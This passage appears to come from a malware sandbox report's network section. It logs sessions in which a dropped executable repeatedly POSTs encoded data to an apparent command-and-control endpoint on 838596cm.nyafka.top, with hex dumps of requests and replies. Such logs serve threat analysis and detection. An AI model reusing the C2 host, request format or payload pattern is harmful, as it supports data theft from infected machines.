                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jGk9JUhuTirIKg8NoV3h8ZRpe1TNR55Pe6aFaMsEcro3cwDGMOvpSA8vRZxTevkSp1l6L4wzjpsGYoPMCZhvMNGkgCvwxO%2FK6YmCykxkXQ8OLfy6SK5G%2BMweIXYtBzhCS1HEON38"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed7a182bb643b3-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2446&min_rtt=1567&rtt_var=2346&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2881&delivery_rate=169708&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          65192.168.2.550048104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:13:49.078306913 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:13:49.426655054 CET2532OUTData Raw: 50 51 5e 52 59 50 56 52 5e 5f 57 54 56 5c 59 58 57 53 58 5c 50 5b 56 59 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: PQ^RYPVR^_WTV\YXWSX\P[VY[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\ +8+^%#!*=2;+X=5\=85X0;P)"'_=45.8.#_&'P-/
                                                                                                          Jan 8, 2025 17:13:49.560324907 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:13:49.787061930 CET816INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:13:49 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hwlxbM12zOpH2%2FWTtLw27cM8%2B6mtsd9C4BSC24%2B8iUSrir4Vcfci2HoZcHIdED4MdWG%2B7I2Z%2BLGBM6VjvWYLNEiTUlSk5jxVM6GqXw%2FhC7rNuv4zHEcSBN%2Bnr%2BpgVTTJG8gDWp%2B5"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed7a206a0043b3-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=5724&min_rtt=2207&rtt_var=7863&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2881&delivery_rate=48108&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          66192.168.2.550049104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:13:49.823780060 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 1828
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:13:50.176285982 CET1828OUTData Raw: 55 52 5b 55 59 50 56 5b 5e 5f 57 54 56 58 59 59 57 52 58 52 50 54 56 59 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: UR[UYPV[^_WTVXYYWRXRPTVY[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\#+%3*9Y,,>X!\)]=\']!(#>;5?X-/#_&'P-?
                                                                                                          Jan 8, 2025 17:13:50.282531977 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:13:50.502681017 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:13:50.526631117 CET961INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:13:50 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bEWprdgW%2Ft9CFmGXMHCWVbssToVIO79YT4OWr8u5WJJMOR%2FxUHf981FFFRsBMNzAolRZbilO9PRaOIv%2BrzVvd0tcNw1%2FNbRpA5kDu1CmgY46%2BFYCfItXvN8QZkbyV1B%2FnnIrH%2BeJ"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed7a24fa5f424b-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4154&min_rtt=1591&rtt_var=5723&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2177&delivery_rate=66072&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 39 38 0d 0a 03 1d 27 0f 24 5b 20 1d 20 38 22 0f 28 5c 27 59 2a 20 3a 1d 2c 39 24 11 27 27 24 17 25 2c 34 58 23 2f 3a 00 2a 28 36 01 26 36 2c 50 3c 01 20 5c 04 1f 27 06 3e 38 35 53 3e 06 2e 1b 24 1d 0f 58 26 1d 01 01 27 3d 3b 5d 27 17 39 0c 34 29 01 1c 2e 20 22 1b 2e 5e 24 11 3f 27 0e 5b 24 3e 2f 50 0f 10 38 54 2c 29 09 5a 21 08 3e 1f 36 1d 24 05 20 25 2c 13 3d 3e 2c 08 21 2f 32 03 24 55 26 0f 20 0c 20 08 25 33 05 19 28 0f 2b 0d 2b 09 24 55 2c 02 2c 49 02 3f 58 52 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 98'$[ 8"(\'Y* :,9$''$%,4X#/:*(6&6,P< \'>85S>.$X&'=;]'94). ".^$?'[$>/P8T,)Z!>6$ %,=>,!/2$U& %3(++$U,,I?XR0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          67192.168.2.550050104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:13:49.982583046 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:13:50.332700014 CET2532OUTData Raw: 55 55 5e 51 59 5a 53 5e 5e 5f 57 54 56 5d 59 58 57 56 58 59 50 5e 56 5e 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: UU^QYZS^^_WTV]YXWVXYP^V^[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\ Y++X$09)%[.'7X>=(;0;"R+/)+!=$-/#_&'P-+
                                                                                                          Jan 8, 2025 17:13:50.441564083 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:13:50.677186966 CET805INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:13:50 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u6jL61g0FOk%2BYtKGOP2rL1fZ5XAT%2BFfUbangAjysat6lXiT33RLytQIMGqig2u11rfDiyzixrr3hUKSaq2ldM%2FlnmXLqgLRnxQuZz4FEsXJyeNmLFYPOLSwrCQg7IfTx9Af7GENm"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed7a25fe0ac34f-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=7588&min_rtt=1480&rtt_var=12772&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2881&delivery_rate=28998&cwnd=180&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          68192.168.2.550051104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:13:50.831573963 CET325OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Jan 8, 2025 17:13:51.178128004 CET2532OUTData Raw: 55 5c 5e 53 5c 5d 56 5c 5e 5f 57 54 56 57 59 58 57 5f 58 52 50 5e 56 58 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: U\^S\]V\^_WTVWYXW_XRP^VX[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\ [<8/X0 .)/7+*6>&+:Q?,>?$[!7,/#_&'P-
                                                                                                          Jan 8, 2025 17:13:51.278647900 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:13:51.517340899 CET804INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:13:51 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lg1Vhx0W%2BaHIordXJai5RYN%2BxvrGQ1MttdsccBagv%2FWyDvyZ9PyVBLNO0d1yFCNGp5CZIMR1iBQvOm338RHMO4STdG0xRCvxY4sbZ50H5DQVKZiwLCqBvlI1IklHG8HNURUHrV8t"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed7a2b3aea424b-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4345&min_rtt=1597&rtt_var=6096&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2857&delivery_rate=61903&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          69192.168.2.550052104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:13:51.753628016 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2528
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:13:52.098242044 CET2528OUTData Raw: 50 56 5b 57 59 59 56 53 5e 5f 57 54 56 5e 59 5e 57 5f 58 52 50 58 56 5a 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: PV[WYYVS^_WTV^Y^W_XRPXVZ[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\ <3'0!*-*.4>>=*:0!+)? Y5>+:#_&'P-7
                                                                                                          Jan 8, 2025 17:13:52.210783005 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:13:52.446707010 CET806INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:13:52 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OUUp8yz7hwc4Wpf0IJxjiBEKesc9zSQRO6%2B6CCE8O17w%2BT2Jc%2BcV8sXjqp9DZl47HnTCEs4rmahZ7aPpic4Wf0mSDZeOlX0FEiVlR7B73SqAsKd4AGv%2BtnIEejEq43rgzxaBVkJY"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed7a310ee0727b-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3610&min_rtt=2007&rtt_var=3960&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2877&delivery_rate=98409&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          70192.168.2.550053104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:13:52.577358007 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2528
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:13:52.930128098 CET2528OUTData Raw: 55 53 5e 52 59 5c 53 5e 5e 5f 57 54 56 5e 59 5d 57 56 58 52 50 5b 56 51 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: US^RY\S^^_WTV^Y]WVXRP[VQ[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\#<;0$0===9.$3X=-9*1$-)",*Y<6>7-?#_&'P-
                                                                                                          Jan 8, 2025 17:13:53.029378891 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:13:53.194094896 CET806INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:13:53 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GIns5c17VNzH0fn302V5cFRS2I%2BCawhkGLVqADuZoC%2F2nmPTcxD9PyT7VxeyaeudPRYZDlj%2Bkseg1uf4tdtjAT6ztTlo9UkAbRSBmanQ%2B87ngx3i6mjWKftR9agAcV0i47ZkYnd3"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed7a362ef143b3-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4145&min_rtt=1561&rtt_var=5754&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2877&delivery_rate=65659&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          71192.168.2.550054104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:13:53.324536085 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:13:53.676292896 CET2532OUTData Raw: 50 56 5b 54 5c 5f 56 5d 5e 5f 57 54 56 58 59 5f 57 5e 58 5f 50 5d 56 5c 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: PV[T\_V]^_WTVXY_W^X_P]V\[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\#<+'01>![,$*>6*>';>Q)"<(<<",?#_&'P-?
                                                                                                          Jan 8, 2025 17:13:53.796535015 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:13:54.014488935 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:13:54.032279968 CET796INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:13:53 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CdYohp5rwm9htkqrNkkR%2BeShUDKBoeqHm2bq7T57HPppYpDI3Wopzhjs46ta2mOGqZPLlTNtDTsEHMcu89TquUVcKiGWdWkMsze7CYFDmOE6W5AxhkuRn2fyz3nCrJ9bMV6r0K1q"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed7a3ae84943b3-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3197&min_rtt=1606&rtt_var=3784&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2881&delivery_rate=101848&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a
                                                                                                          Data Ascii: 41U][
                                                                                                          Jan 8, 2025 17:13:54.124728918 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          72192.168.2.550055104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:13:54.541273117 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:13:54.894998074 CET2532OUTData Raw: 50 52 5b 50 5c 58 56 5a 5e 5f 57 54 56 5a 59 5e 57 50 58 5b 50 58 56 5b 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: PR[P\XVZ^_WTVZY^WPX[PXV[[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\#(++$0>^*-];7#[)>]*"'S?/_)/8Y5=^9/#_&'P-7
                                                                                                          Jan 8, 2025 17:13:54.994374990 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:13:55.238485098 CET817INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:13:55 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B1GOXktV7UXxAabb3ucL%2Bq7Au1fyyLohpTN4AD%2FT56R%2Fqu%2FccnB2BL%2Bmq5ujEXJ6M9Z9kgcRiNDGJs%2Bz2loNKM5JeBL9WIvfT6uxd1oWPwktgDhgFFJmalWB6%2F%2BSJkDpAbFcBOHW"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed7a426f69c34f-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2860&min_rtt=1538&rtt_var=3222&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2881&delivery_rate=120471&cwnd=180&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          73192.168.2.550056104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:13:55.372756958 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2528
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          74192.168.2.550057104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:13:55.543040037 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 1852
